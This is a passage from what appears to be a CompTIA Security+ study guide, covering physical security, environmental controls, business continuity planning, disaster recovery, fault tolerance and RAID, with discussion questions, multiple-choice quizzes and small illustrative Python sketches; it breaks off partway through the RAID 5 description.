Note: Key management is every bit as essential with conventional locks as it is with cryptography. If you don't know who has keys for a given lock, and if you're not reasonably certain no one has made unauthorized duplicates, you can't trust that it will provide any real security.


Electronic locks: In modern facilities, electronic locks give features and security that conventional ones
cannot. Most obviously, they can accept a variety of credentials depending on the
lock's input mechanism.

 Numeric passcodes
 Embedded chips or magnetic strips in ID badges
 Electronic tokens read by a proximity sensor
 Fingerprints or other biometric information

Note: Unlike conventional locks, electronic locks won't work without power, whether AC or battery backup. It's important to know whether an electronic lock is fail-safe/fail-open, meaning that it unlocks when power is cut; or fail-secure/fail-closed, meaning that it locks when power is cut. Fail-secure locks are more secure, but can trap people in an emergency.
Guards: In addition to traditional security guards checking badges or other credentials manually, human security can be as simple as a welcome desk worker seated before a door, or an electronic lock that's opened remotely by someone manning a camera or intercom.

Mantrap: High-security areas can use two doors in a row to create a small room, or "trap", that can only admit one person at a time. Since only one door can open at a time, and each person entering must separately present credentials, it discourages tailgating. More secure mantraps use pressure sensors or guards to make sure that users don't try to bypass the system.

Logging: Electronic locks and guards can easily be made to log everyone who passes through a doorway, and check them against an access list of allowed personnel. Even without locks, cameras or even sign-in sheets can monitor passage.


Securing equipment
Don't think of physical security as just a matter of perimeters and checkpoints. It's often important to closely
monitor specific equipment and resources, especially valuable equipment in low-security areas, or critical
assets wherever they might be.

Exam Objective: CompTIA SY0-501 3.9.6, 3.9.7, 3.9.8, 3.9.17

 While it's easy to remember to keep server rooms or file rooms tightly secured, it can be even easier for
an attacker to gain unobserved access from a telecommunications closet holding servers or central
connections. Keep access to network hardware tightly restricted.
 Use hardware locks or locked cabinets to protect easily stolen equipment like workstations and lone
servers, especially in low security areas.
 Especially valuable items or data and documentation that doesn't need online accessibility can be stored
in a locked safe. Choose fire resistant models for additional protection in case of disaster.
 Secure physical access to wireless access points. This can be a particular challenge since WAP antennas
don't work well inside a locked cabinet.
 Watch for where network outlets or even cables can be targeted by an attacker. Protected distribution
systems used to carry unencrypted classified data rely on physical security throughout their length,
wherever they might lead. Commonly they run through pipes to restrict physical access, and connect
only to secured terminals.
 Watch for signs of intrusion or social engineering attacks. Where security personnel are unaware, it's
easy for someone pretending to be IT to just walk off with entire computers.

Discussion: Physical security


1. Does your workplace have clearly defined security zones?
Answers may vary.
2. What physical security controls are employed at your workplace?
At the least most businesses have locks and alarms.
3. Are computers and network equipment in your workplace physically secured?
Answers may vary.
4. Create a short list of improvements you could make to physical security in your workplace. For each, note
whether they would be easy to deploy, or require major changes to the facility.
Answers may vary.

Environmental controls
Physical security has a lot of overlap with safety and overall facilities management. Part of this is managing
and monitoring the environmental controls used to protect sensitive equipment and other physical assets.
Server rooms in particular need strong environmental controls to function, but it hardly stops there. Common
environmental controls include:
 Heating, Ventilation, and Air Conditioning (HVAC)
 Electromagnetic shielding
 Fire suppression


HVAC systems
Modern office buildings tend to have HVAC systems that provide climate control throughout the entire
building. A properly functioning HVAC system provides clean and fresh air, and moderates both temperature
and humidity to comfortable levels. In today's workplace, HVAC isn't just a matter of human comfort:
electronic equipment can be very sensitive to extremes of temperature and humidity. Almost everyone knows
computers can overheat and are damaged by water, but many neglect that low temperatures can make some
electronics unreliable or short-lived, and low humidity increases risk of electrostatic discharge (ESD) that can
damage sensitive components.

Exam Objective: CompTIA SY0-501 3.9.16.1, 3.9.16.2


The recommended environmental range for a given piece of electronic equipment is probably hidden in the
documentation or label fine print somewhere, but mostly it's not far from ranges that are comfortable for
humans. Cisco's recommendation for data center equipment is a temperature range of 64.4°-80.6°F (18°-27°C), with 40%-60% relative humidity.
The similarity can be misleading, though, since HVAC controls meant for humans can have serious problems keeping computers safe. Computers, especially when clustered in server
rooms and cabinets, can generate a lot of heat that ordinary systems won't dissipate quickly enough.
Additionally, many HVAC systems in office spaces are designed to turn themselves down after hours—
equipment left running 24/7 needs constant environmental controls as well. Usually it's best to use a separate,
dedicated HVAC system for areas where sensitive electronics are stored.
Wherever you have sensitive equipment, you should be aware of its environmental needs and add proper
controls to make sure it's kept in a safe range. It's a good idea to place environmental monitors with clusters of
sensitive or power-hungry equipment in particular. Isolated but critical components should be monitored as
well, especially if they're in "unusual" locations like basements or attics with different climate conditions than
office spaces.
Air flow is a particular concern: without it, electronics readily overheat. It's most pronounced in server rooms
and data centers, which use tricks like cold aisles between rows of equipment to deliver cool air through the
room alternating with hot aisles that carry hot air to the return vent. Servers are then placed back-to-back, so
the air flow passes correctly through each system.

Even with fairly rugged electronics, rapid temperature changes or sharp temperature gradients are dangerous
because they can cause condensation that will corrode or short out electrical equipment. Equipment or
connectors alongside unshielded outside walls, cold water pipes, or other cool surfaces are at highest risk of
condensation damage.


EMI shielding
Electrical currents, especially high-frequency, low-power signals such as those used in data networks, are
subject to noise from electromagnetic sources in their environment, such as radio transmitters, electrical
motors, or power cables. They also generate the same sort of noise, and can interfere with other equipment.
This is called electromagnetic interference (EMI). EMI is actually an electromagnetic signal, and when it
occurs on the frequencies used by radio equipment, it's also called radio frequency interference (RFI).

Exam Objective: CompTIA SY0-501 3.3.1.8, 3.9.11

EMI can cause all sorts of problems: it can hurt network performance by causing line noise, overload devices,
or even allow an attacker to eavesdrop on wired communications or display devices by the interference they
generate. RFI is a prime cause of static or other noise in radio communications, whether AM radio, cell
phones, Wi-Fi, or others. It doesn't help that many radio devices use similar frequencies, and that electrical
sources typically affect devices on a wide range of frequencies.
More severe than EMI is an electromagnetic pulse (EMP) generated by a brief but powerful surge of
electromagnetic radiation, such as a lightning strike, nuclear weapon, or theoretically by a specially designed
but non-nuclear "e-bomb." Even ordinary electrostatic discharge is a very small and local EMP. Just like with
EMI, unprotected wires and circuits behave like an antenna in proximity to an EMP, but instead of just causing interference, the EMP can do permanent damage to hardware. Fortunately, all known sources of EMP are either
rare, short in range, or both.
Protecting against EMI is important for both performance and security. For performance, it's important to
watch for EMI when stringing cables or placing wireless networks. Electric motors, microwave emitters,
HVAC equipment, and other industrial devices can be particularly potent interference sources. When
avoidance isn't an option, shielding is effective: grounded metal enclosures are particularly good at protecting
equipment against interference and eavesdroppers alike. You can protect wired networks by using shielded
cables, or run them through steel conduits if necessary. Server rooms or other equipment that is sensitive to or
generates EMI can be enclosed in a faraday cage, typically a fine wire mesh that is grounded and completely
surrounds the hardware.
Using EMI alone to eavesdrop requires specialized equipment, so it's mostly a concern for high security
facilities. There are products and standards designed to provide EMI security. For instance, the TEMPEST
anti-surveillance standards used by the NSA and NATO define ways to shield equipment against
eavesdropping via EMI, vibration, and other means. While the full standards are classified, the non-classified
elements have been used and applied by non-government security experts and equipment vendors.


Fire suppression
Fire is a risk in any building, no matter how you work to prevent it. Electronic equipment uses electricity and
generates heat, so it heightens that risk. It also adds an extra challenge to fire suppression systems: not only is
fighting an electrical fire different than fighting one caused by ordinary flammable materials, but water can
easily destroy expensive electronics even if the fire was easily extinguished or a false alarm.

Exam Objective: CompTIA SY0-501 3.9.16.3


Fire detection systems are a first line of defense. Smoke detectors, heat sensors, and carbon monoxide
detectors all have their place in recognizing early signs of a fire: at the minimum, they should signal a fire
alarm to alert local personnel. They can also be networked to notify offsite personnel or fire departments,
trigger suppression systems, or shut down building HVAC before it can carry toxic smoke through the
ventilation system.
When a fire is detected, the best way to minimize damage is to put it out while it's still small and localized.
Portable fire extinguishers should be placed in clearly visible locations near flammable materials and other fire risks: the exact number and placement needed will depend on the building's structure, contents, and usage, along with
local fire safety regulations. They must also be regularly inspected and tested by qualified technicians, and
tagged as compliant.
You can't just use any extinguisher on any fire: for example, an extinguisher using pressurized water will put
out burning paper fine, but it will only spread a grease fire or even cause an explosion. Always choose
extinguishers appropriate for the types of fire they will be protecting against. Rating systems vary by region. In the US, the following extinguisher classes are defined; a given extinguisher may be rated for one or more classes.

Class A: Most flammable solids, such as paper, cloth, wood, or plastic. Class A extinguishers typically use pressurized water, or multipurpose dry chemical.

Class B: Flammable liquids, such as oils, solvents, or gasoline. Class B extinguishers typically use CO2 or dry chemical mixes, and work by depriving the fire of oxygen.

Class C: Fires involving active electrical current, not only in electrical equipment but in other flammable materials in contact with exposed wiring. Class C extinguishers generally use CO2 or dry chemicals.

Class D: Combustible metals such as magnesium or sodium. Such metal fires can use water or CO2 as an oxidizer just like oxygen, so must be put out using specialized dry powder extinguishers.

Class K: Cooking oils and fats. Functionally Class K extinguishers are more or less the same as Class B, but are specialized for kitchen use.


When a portable extinguisher is too little or too late, your facility should be equipped with fixed systems that
can extinguish larger fires, or at least control them until firefighters arrive. In most commercial buildings, this
means a water-based sprinkler system triggered manually or automatically in case of fire. Since water is
dangerous to use on electrical equipment, sprinklers frequently are tied to systems that cut power to electrical
equipment, and are not installed in fire-resistant electrical rooms or other places where water and fire would
make an especially dangerous combination.
Where fire is a risk, but sprinklers are inappropriate, alternate fixed systems are available. For electrical areas
like server rooms, a popular choice was formerly Halon, a non-flammable gas that stops the chemical reaction
of a fire while minimizing harm to evacuating personnel and emergency responders. Due to health and environmental concerns, Halon has largely been replaced by other inert gases or "clean agent" mixtures such as FM-200 (HFC-227ea), though even those are commonly still called "Halon" in casual speech. Fire-
suppressing gas systems of any sort can still be hazardous to humans, so if your server room uses one make
sure to study its directions and safety guidelines.

Coordinating security and safety procedures


Especially in smaller organizations, the person (or people) in charge of security policies will often also be in charge of emergency procedures. It's not too surprising: both roles exist to protect company
assets and functions in the face of the dangerous and unexpected. It's fortunate in a way, since sometimes the
two can seemingly work against each other: locking the physical environment up too tightly can prevent fast
and safe evacuations; on the other hand, the chaos of a poorly managed drill or actual emergency can make a
fine time for a security breach.
Above all, safety laws and ethical principles dictate that you have to put human lives ahead of data security,
but with careful policy design the two shouldn't interfere with each other.

 Consult a building layout while planning both secured areas and fire escape routes, so that the former
don't obstruct the latter.
 In the event of power loss, carefully distinguish where fail-closed electronic locks can keep areas secure, and where fail-open locks must enable safe escape.
 Where necessary use alarmed, one-way emergency exit doors to allow easy escape without
compromising security.
 Use alert systems to warn personnel about both safety and security emergencies, but make sure one
won't be easily mistaken for the other.
 Regularly test safety controls and perform emergency drills with employees, both to ensure they operate
correctly and to reduce panic or confusion in the case of a real emergency or even false alarm.
 Coordinate all safety drills and tests with security personnel, so that secure systems won't be threatened.
Discussion: Safety and environmental controls
1. Is all of your workplace's electronic equipment kept in areas with ample cooling and ventilation?
Answers may vary.
2. Identify potential sources of EMI in your workplace.
Answers may vary, and include electrical devices, HVAC systems, and microwave ovens.
3. What fire suppression measures are available in your workplace?
Portable extinguishers and fixed systems are both likely.
4. Are employees in your workplace trained in safety procedures?
Answers may vary, but they should be.
5. Could any of the physical security controls in your workplace compromise safety, or vice-versa?
Answers may vary.


Assessment: Physical security and safety


1. You need to install a new fire extinguisher next to the server closet. What class would be most useful?
Choose the best response.
 Class A
 Class B
 Class C
 Class D

2. What qualifies as both a preventive and a detective control? Choose the best response.
 A locked door
 A motion detector
 A security guard
 A surveillance camera

3. What are hot and cold aisles designed to assist? Choose the best response.
 Air circulation in the server room
 Defining routes for evacuating employees and incoming emergency workers
 Preventing EMI
 Preventing the spread of fires

4. One server closet has particularly sensitive equipment that's suffering EMI due to a nearby electrical
motor. You can't really move either the equipment or the motor, so what option might help? Choose the
best response.
 Airgap
 Cold aisle
 Faraday cage
 Mantrap

5. Fail-close door locks are _________. Choose the best response.


 Good for safety and security
 Good for safety but bad for security
 Bad for safety but good for security
 Bad for safety and security

6. In a building floor plan you see lines representing a Protected Distribution System. What is it used for?
Choose the best response.
 Backup power
 Encrypted data
 HVAC Controls
 Unencrypted data


Summary: Organizational Security


You should now know:
 How to design and document effective security policies, including acceptable use, passwords,
personnel management, and change management. You should also know how to plan business
agreements with security in mind.
 How to enforce security policies and best practices through role-based employee training, and how to
revise policies and training procedures over time.
 How to choose appropriate physical security and environmental controls to protect facilities,
equipment, and data, without endangering the safety of employees.

Chapter 11: Disaster planning and recovery
You will learn:
 About business continuity planning
 About fault tolerance and recovery
 How to respond to security incidents


Module A: Business continuity


Bad things are ahead for your organization. Even if you meet your business goals and successfully
identify and mitigate risks, at best that makes disasters less frequent and less severe. When a disaster strikes
—natural, technical, or human-created—your organization's existence itself could be at stake. Having plans
and procedures in place beforehand can make all the difference in whether you can maintain business
operations and recover from a serious problem.
You will learn:
 About continuity planning
 How to create business continuity plans
 How to create and test disaster recovery plans

Continuity planning
When disaster strikes, your organization's business continuity depends on being able to maintain the function
of critical operations through the recovery process, or at least to restore them quickly enough to not endanger
the organization's long-term survival. It's a big concept, and it's natural to associate it with major disasters like
a fire, flood, or massive data breach that would be a challenge to a well-prepared organization, but that's not
the only time when it comes into play. Many businesses have been lastingly damaged or even bankrupted by
the results of small failures like a hard drive crash, the loss of a critical employee, or a badly timed service
outage—in those cases, poor planning and an inadequate response are almost always to blame.
Continuity planning is tied in closely with risk management: it includes not only enhancing your
organization's resilience against both anticipated and unanticipated threats, but also ensuring its ability to
recover from serious setbacks. It should even include contingency plans for how to minimize the impact on
the organization or its stakeholders if full recovery is impossible.
Business continuity planning isn't an easy task, since there are many interrelated challenges you need to
address, and multiple plans or documents you might need to produce as part of your overall strategy.

Business continuity plan (BCP): A document including analysis of risks to business operations, controls to
mitigate them, and procedures for maintaining or restoring service in the event of disaster. The BCP might be
a comprehensive document including all others within it, or it might focus on centralized business functions
such as payroll and customer service.

Business impact analysis (BIA): An assessment that identifies critical business functions, how long the
business can operate without them, and what threats exist to each.

Disaster recovery plan (DRP): Technical procedures for restoring services and operations after major
disruptions. A single organization may have multiple DRPs, for example for individual facilities, departments,
or business functions.

IT contingency plan: Procedures for restoring individual information systems after a disaster, or for
maintaining partial function during the recovery process. Also known as an information system contingency
plan (ISCP). Multiple ISCPs might be defined under one DRP, corresponding to each critical system or
service.

Continuity of operations plan (COOP): Procedures for moving critical operations to a temporary site during
disaster recovery. Can apply to general business functions as well as IT systems in particular.

Crisis communications plan: Procedures for communications in the event of a disaster. Crisis communication
plans should both coordinate internal communications to aid in recovery efforts, and define a single authority
for providing information to or answering questions from customers or outside organizations.

Succession plan: Procedures for managing sudden changes of personnel. Succession plans should identify
essential employee roles within the organization, and identify or train replacements that can step in should
those roles become open. They should also define a clear chain of command during disaster recovery.

Creating a BCP
Just creating a full business continuity plan is a lot of work, never mind any expense you have to put into
preparations. The first challenge can be getting management to buy into it: if even a devastating threat seems
distant or unlikely, it's common for people to resist putting much time and money into combating it. It's
important to make a strong business case by showing what the lack of such a plan could cost.
Actually creating the BCP will require a committee with representatives from different departments across your
organization. Otherwise, it's possible that essential business operations won't be accounted for. You'll also
need a methodology for the entire process. ISO 22301:2012 provides a general standard for business
continuity planning, but you'll also want to research resources specific to your organization's mission and
structure. Government resources can be particularly useful: not only do government agencies regularly plan
for and respond to disasters ranging from local disruptions to global catastrophes, they have a strong interest
in helping public and private organizations within their borders plan as well. In the US, the Federal
Emergency Management Agency (FEMA) publishes BCP guidelines and offers resources for state and local
agencies as well as private companies.
In general, the process of creating a BCP mirrors that of any other risk management program.

1. Perform a risk assessment, much like for normal security planning.


2. Create a BIA.
3. Design the BCP and its supporting recovery plans and controls.
4. Implement and test the plan.
5. Analyze the results to apply further refinement.

Creating a BIA
A business impact analysis is related to the impact analysis of a risk assessment, but it comes from the
opposite direction. Instead of starting with a list of threats and determining what damage each could do to
your organization, the BIA begins with a list of your business's functions, and determines how long it could
function without each.

Exam Objective: CompTIA SY0-501 5.2.4, 5.2.5

1. Identify functions critical to sustained business operations. A function is critical if its loss would result in
large revenue loss, safety risks, or failure to comply with regulations and contractual obligations.
2. Identify systems, resources, or even other functions used by each critical function.
For example, a technical support call center requires telephone service, electrical power, and access to
the company's product knowledge base.
3. Prioritize critical functions according to maximum tolerable downtime (MTD), or how quickly they must
be restored to prevent serious damage to business operations.
For example, a critical function may need to be restored within four hours, an important function within
72 hours, and a useful but non-essential function within 30 days.


4. Identify what threats could compromise each business function.


Threats could be natural disasters, accidents, inside or outside attacks, contractual or labor disputes, and
even armed conflict.
5. Determine mitigation techniques that could be used against each threat.
For example, if the threat is "a hard drive crash on the company web server" you could mitigate it
through performing regular backups, or by maintaining redundant servers so if one crashes the other
can take over.
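
If it helps to see the idea concretely, the following is a minimal Python sketch (not part of the exam
objectives) of how BIA findings like those in the steps above might be recorded and prioritized by MTD. The
field names and sample values are illustrative assumptions, not prescribed by any standard.

# A minimal sketch of recording and prioritizing BIA entries.
# All field names and sample values are illustrative only.
critical_functions = [
    {"function": "Payment processing", "mtd_hours": 4,
     "depends_on": ["database server", "payment gateway", "power"],
     "threats": ["hard drive crash", "DDoS", "power outage"]},
    {"function": "Technical support call center", "mtd_hours": 72,
     "depends_on": ["telephone service", "power", "knowledge base"],
     "threats": ["telecom outage", "staff shortage"]},
    {"function": "Internal reporting", "mtd_hours": 720,   # roughly 30 days
     "depends_on": ["file server"],
     "threats": ["file server failure"]},
]

# Prioritize by maximum tolerable downtime: the shorter the MTD,
# the sooner the function must be restored after a disaster.
for entry in sorted(critical_functions, key=lambda e: e["mtd_hours"]):
    print(f'{entry["function"]}: restore within {entry["mtd_hours"]} h '
          f'(depends on {", ".join(entry["depends_on"])})')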

Disaster recovery plans


One of the most demanding parts of BCP design is creating the DRPs, ISCPs, COOP, and other necessary
procedures that back up the high-level concepts in the BCP itself. They can be highly detailed technical
documents, cataloging all that you need to do to restore or maintain business operations, both before and after
disaster strikes. The first step is determining what information each plan needs.

Exam Objective: CompTIA SY0-501 5.6.2, 5.6.5.5

System Documentation Network diagrams, facilities blueprints, system configuration data, user names
and passwords, software activation keys.
Reserve resources Replacement parts, redundant systems, and alternate sites that can be used to
repair or replace the affected resource.
Vendor lists Vendors and suppliers for equipment that may need to be replaced, and
procedures or contracts needed for quick replacement of critical components.
Alternate business practices Procedures that allow you to meet your business needs during a recovery
period, especially in regard to contractual or regulatory requirements. For example, if a datacenter
outage forces you to use different payment processing procedures, they still must have comparable
security controls.
Backup policies Procedures for creating and safely storing backups that can be restored in case of
system or data loss.
Recovery procedures Detailed procedures for assessing, containing, and repairing damage to critical
systems, as well as for restoring those which cannot be repaired.
Order of recovery A list of what functionality should be restored in which order following a disaster.
Most obviously it should give priority to business-critical functions, but it might
also be based on dependencies between different functions, or on the difficulty of
a specific task.
Personnel list The members of each recovery team, along with their responsibilities and contact
information.
Emergency contacts Contact information for relevant parties outside the team, such as upper
management, utility companies, or emergency services.

The plans themselves should be detailed, but easy to read and follow, especially any which might need to be
followed under stressful emergency conditions. To ensure that recovery documents themselves won't be lost
or inaccessible in case of disaster, they should be stored both electronically and on paper, and copies should
be kept both on and off site. At the same time, plans with information useful to an attacker should be kept
secure and confidential.


BCP and DRP testing


Even if you put a lot of care into your plan, that doesn't mean it's any good. To look for problems or critical
oversights it needs to be tested. In fact, to keep personnel practiced and to adjust for any changes in your
situation, you should test all plans regularly, typically at least twice a year. There are multiple ways to conduct
a test; as you might expect, the most accurate ways are also the most work, but a mix of techniques is best.

Exam Objective: CompTIA SY0-501 5.6.5.1, 5.6.5.2

Checklist test Giving the plan to one or more people to review and examine item by item.
Having at least one person from each affected department perform a checklist test
is a good way to find out whether the plan is outdated, whether contact information is
wrong, and whether any steps or supplementary documentation are missing.
Tabletop exercise Gathering the team or department together to review the plan and walk through a
theoretical disaster step by step. Also known as structured walkthroughs, tabletop
exercises are especially useful for identifying missing steps or problems with how
responsibilities are assigned.
Simulation test Testing the actual disaster response under controlled circumstances, either on
a small or a large scale. Simulation tests are the best way to find holes in a plan
that other methods miss, but they can be difficult and potentially disruptive to
hold. Some simulation test examples include:
 Conducting emergency drills to test alarms and personnel training
 Testing secondary systems
 Simulating bringing an alternate site online from backups
 Testing the ability of the primary system to switch to the secondary system

Whatever type of test you conduct, use it to generate feedback and make changes. Likewise, if all or part of
the plan is put into action by a real disaster or even a false alarm, schedule a review by the whole team in
order to look for where the plan can be revised and improved. Finally, understand that any BCP or DRP is a
living document: even if you're confident it doesn't have any major weaknesses, a change in system
configuration, personnel, or overall situation means you'll need to look for new shortcomings in your plan.

Discussion: Continuity planning


1. Perform a simple BIA for your organization, based on your existing knowledge.
Answers may vary.
2. Based on your BIA, choose a couple of potential disasters and design recovery plans.
Answers may vary.
3. List some resources and detailed procedures you'd need to really put those plans into motion.
Answers may vary.


Assessment: Business continuity


1. What document specifically covers moving operations to a temporary site? Choose the best response.
 BCP
 BIA
 COOP
 DRP

2. Which document is a business most likely to have more than one of? Choose the best response.
 BCP
 BIA
 COOP
 DRP

3. What is also known as a "structured walkthrough?" Choose the best response.


 Checklist test
 ISCP
 Simulation test
 Tabletop exercise


Module B: Fault tolerance and recovery


Technical decisions for disaster recovery should back up your policy decisions. Equipment failures or other
damage to systems are inevitable, so you need to choose solutions that both minimize the chance of
permanent data loss, and prevent unacceptable disruptions of business operations.
You will learn:
 About recovery objectives
 About fault tolerance and redundant systems
 About RAID
 How to design backup policies

Recovery objectives
When it comes to choosing recovery options, the old adage of "good, fast, or cheap—pick two" generally
holds true. Recovering quickly and completely from a major disaster will generally take not only more
planning, but more work and expense beforehand. For critical services this may be money well-spent, but
you'll have to evaluate options for each plan.

Exam Objective: CompTIA SY0-501 5.2.1


When you create a BIA, or sign an SLA for a service you're buying or providing, it's likely to have a couple of
related terms for when and how services will be restored in the event of a disaster.

Recovery time objective (RTO): The maximum expected amount of down time between when a service is taken
offline by a disaster, and when its functions will be fully restored. This can include troubleshooting prior to
recovery, the recovery itself, and any testing necessary before bringing the recovered system live. For example,
if a failure of your payroll systems will start to cause serious impact after about two weeks, an RTO of 14 days
or fewer gives you time to prevent disruptions. RTO is related to the concept of MTTR, though it's used in
relation to recovery from a particular disaster rather than to a particular device failure.

Recovery point objective (RPO): The maximum expected period of time for which data will be lost in the case
of a disaster. Essentially, RPO is a function of how often you must back up data used by a service. For example,
if you want to make sure that a failure of your content management system will never cause you to lose more
than a day's work, you can define an RPO of 24 hours, and satisfy it by making nightly backups of the
repository.

Both RTO and RPO are flexible: you can set them as long or as short as you like, according to how critical the
system's ongoing functions or past data are. Ideally they'd both be measured in milliseconds, but that can be
very expensive. An RPO measured in days can be satisfied by ordinary backup methods, while one of a few
hours or less requires continuous backup solutions of some kind. Similarly, a sufficiently long RTO gives you
time to set up a new system and restore data even if you have to order new equipment, while an RTO of
seconds can be satisfied only by a redundant system ready to go on demand.
Additionally, RTO and RPO are independent of each other, at least to some extent: if it's not important that a
payment system comes back online quickly, but it's essential that no existing transactions be lost, you can
keep continuous backups, but set a 30 day RTO and restore service once you have the time.
Finally, remember that RTO and RPO are goals, and there's no magic that will guarantee they are met. When
creating a plan you'll need to make a cost-benefit analysis to find a realistic RTO and RPO according to your
needs and budget, and carefully design procedures to ensure you'll meet them. When defining either as part of
an SLA, you'll also need to define what rights and obligations each party has if objectives can't be met.
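
As a rough illustration of the arithmetic behind these objectives, the Python sketch below checks whether a
hypothetical backup schedule and recovery estimate satisfy a given RPO and RTO. The function names and
figures are assumptions for illustration, not a standard formula.

# A rough sketch of RPO/RTO planning arithmetic; names and values are hypothetical.

def worst_case_data_loss(backup_interval_hours):
    """With periodic backups, the worst case is losing everything
    written since the last backup completed."""
    return backup_interval_hours

def meets_objectives(backup_interval_hours, estimated_recovery_hours,
                     rpo_hours, rto_hours):
    return (worst_case_data_loss(backup_interval_hours) <= rpo_hours
            and estimated_recovery_hours <= rto_hours)

# Nightly backups and a two-day rebuild, against a 24-hour RPO and 14-day RTO:
print(meets_objectives(backup_interval_hours=24, estimated_recovery_hours=48,
                       rpo_hours=24, rto_hours=14 * 24))   # True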


Fault tolerance
Reducing RTO and RPO are just two ways of increasing the availability of critical services and data. The third
is reducing failure in the first place, by increasing MTTF or MTBF. To maintain high-availability services,
you need to target these three elements both separately and as an interrelated whole, and do so within your
budget.

Exam Objective: CompTIA SY0-501 3.8.9, 3.8.10, 5.2.6


Any technological system, from a CPU cooler to a datacenter, has components that can and will fail over
time. A given component is a single point of failure if its failure will stop the entire system from working,
very much like a failure in a critical system is for a business. Consider a desktop computer: the failure of a
single application process, USB port, or optical drive is unlikely to render the computer useless. On the other
hand, a failure of the operating system kernel, power supply, or system drive will knock the computer out of
commission until it's repaired. Single points of failure are one of the main enemies of availability.
The simplest way to deal with a single point of failure is to reinforce it so it's less likely to fail, for example
by buying a higher quality component. A more complete solution is to use fault-tolerant systems, where a
failure of a critical component might impair the overall system, but won't make it fail. For example, storage
media, network protocols, and even RAM can be designed to detect and correct small data errors that would
otherwise result in data corruption. On an older PC a CPU with a failed fan might crash or even destroy itself
from overheating; a modern CPU will detect the overheating and slow itself down to keep operating at
reduced performance. You can even apply this sort of fault-tolerance to software: in older versions of
Windows failure of the graphics driver was one of the most common reasons for "BSOD" errors and system
reboots, while in modern versions Windows can restart most hardware drivers without more than brief
disruption to other applications.

Redundancy
Fault tolerance doesn't have to be a matter of designing individual components to cope better with errors. In
fact, it's more common to add redundancy: backup or parallel components structured so that a failure in one
still leaves the other working and able to sustain the system. Even better, you might be able to repair or
replace the failed component without interrupting service—that way, you're not just increasing the time
between failures, but you're eliminating any service disruption during the inevitable repair process. A
redundant component that can be replaced without shutting down the system it's attached to is called hot-
swappable.

Exam Objective: CompTIA SY0-501 3.8.5, 3.8.6, 3.8.7, 3.8.8


Redundancy can be applied to physical components, entire systems, or support services. A wide variety of
redundancy solutions are popular in modern networks.

Backup power Brief power outages or irregularities can be compensated for by a battery-powered
uninterruptible power supply (UPS), while longer ones require backup generators. Servers
also commonly have redundant power supplies, allowing one to be replaced if it fails.
RAID A Redundant array of independent disks allows redundancy by saving data to multiple hard
drives at once. That way, a failure in one drive can be compensated for without data loss.
Load balancing While splitting a high-traffic service among multiple redundant servers is usually done for
sake of performance, it also means that the failure of one server only reduces performance
rather than interrupting service.
Clustering Server clustering is related to, and often used in conjunction with, load balancing, but it
goes a little further. Multiple servers in a cluster don't just supply redundant resources, but
are aware of each other and operate toward a common goal. Clusters are usually able to
dynamically reallocate duties when individual servers fail.


Virtualization Virtual and cloud systems don't in themselves provide redundancy, but they make it much
easier to quickly deploy new copies of existing systems whenever and wherever you need
them. This doesn't only help with recovery from a failure; it also can provide elasticity to
meet transient surges in demand and scalability to meet long-term growth.
Alternate sites Large organizations might even maintain multiple facilities for sake of redundancy. If a
disaster impairs or disables one site, others can pick up the slack until service is restored.
Even if there aren't specific backup sites, distributive allocation of critical business
resources means that failures at one site will do minimal harm to the overall organization.
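
As a rough illustration of why redundancy pays off, the short Python sketch below estimates the combined
availability of redundant components, assuming their failures are independent. The 99% figure is purely an
illustrative assumption.

# Rough illustration (assuming independent failures) of how redundant
# components raise overall availability. The 99% figure is just an example.

def redundant_availability(component_availability, copies):
    """The system stays up unless every redundant copy fails at once."""
    return 1 - (1 - component_availability) ** copies

single = 0.99                            # one power supply: ~3.7 days of downtime per year
dual = redundant_availability(0.99, 2)   # two redundant supplies: under an hour per year
print(f"single: {single:.4f}, dual: {dual:.4f}")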

Alternate sites and spare parts


Different scales of disaster require different kinds of responses. For limited problems, like a failure in an
individual critical system, you might be able to meet your recovery objectives right on site. One of the best
ways to reduce the RTO of an equipment failure is to keep spares on hand, to save the time of purchasing a
new hard drive, power supply, or critical server.

Exam Objective: CompTIA SY0-501 5.6.1, 5.6.4.2, 5.6.4.3, 5.6.5.4, 5.6.5.3

Hot spare A spare component that's connected, powered on, and ready to serve as an automatic failover if
the primary fails. A fault-tolerant server might have hot spare drives or network cards ready to
take over at a moment's notice.
Cold spare A spare component that's kept in storage until it's needed. A technician must install it and power
it up in order to restore the system to normal function. A cold spare can still be a hot-swappable
device.

Larger disasters, like a fire, flood, or long-term power outage, could disable your entire facility. To plan for
that sort of disaster, you'll need to line up an alternate site. Depending on your needs and budget, you might
pay for a dedicated site exclusively used by your organization, or you might time-share a site with another
organization, with the understanding that things will be more difficult if you both need it at once. Alternate
sites are also classified by "temperature."

Hot site A fully operational site, complete with computer hardware, network infrastructure, installed
software, and even recent backups: it can be activated in hours, or less, from the recovery plan's
initiation. While a hot site maximizes availability, it's expensive to maintain what is essentially a
second data center sitting idle most of the time. Sufficiently large organizations might instead use
distributive allocation so that the "hot site" itself is just excess capacity spread throughout
multiple active sites.
Cold site A site without hardware set up in advance. Typically a cold site will have power, ventilation, and
network connectivity, but otherwise it's an empty space. To actually recover operations there,
you'll need to install hardware, configure the network, install software, and restore backups. A
cold site is much slower to restore than a hot site, but it's no more expensive than the rent.
Warm site A compromise between a hot site and a cold site. At the least it will have some computers and
networking hardware set up, even if it's not a complete replica of the primary site; it may also
have software installed, or older backups. A warm site can be operational much more quickly than a cold
site, but less quickly than a hot site; likewise, its cost is intermediate between the two.

For IT services alone, a cloud provider might be more cost-effective for some purposes than even a time-
shared alternate site, but a physical location allows you to carry on a wider range of business operations.
Regardless of what kind of alternate site you choose, it's important to find a location that you can operate
effectively out of. Depending on the nature of your business it may be complicated to maintain or move to an
alternate site far from your primary one. On the other hand, in the event of some widespread disaster like a
large storm or armed conflict two nearby sites might be placed out of commission at once.


RAID
With RAID, two or more hard drives are configured into an array, and data is saved across all of them. How
the data is distributed across the array depends on the RAID level configured—different levels provide
different combinations of improved performance and data security.

Exam Objective: CompTIA SY0-501 3.8.11

RAID 5 provides striping and parity across three or more disks

RAID 0 Spreads the contents of files in roughly even parts across two or more drives; also called disk
striping. Striping improves performance by allowing the CPU to read and write simultaneously
on all drives at once, but since there's no fault tolerance if just one drive fails all the data in the
array is lost. This means that RAID 0 actually makes data less secure by introducing more
points of failure. RAID 0 is only useful for data that needs high speed access but either doesn't
need to be backed up or is preserved by other means.
RAID 1 Writes identical data to two or more hard drives; also called drive mirroring. Mirroring doesn't
really help performance: reading can be a little faster but write performance is typically slower.
The benefit of RAID 1 is fault tolerance. If one drive in the array fails, all the data is available
on at least one other drive.
RAID 5 Uses disk striping across at least three drives and includes parity data. If one of the drives in the
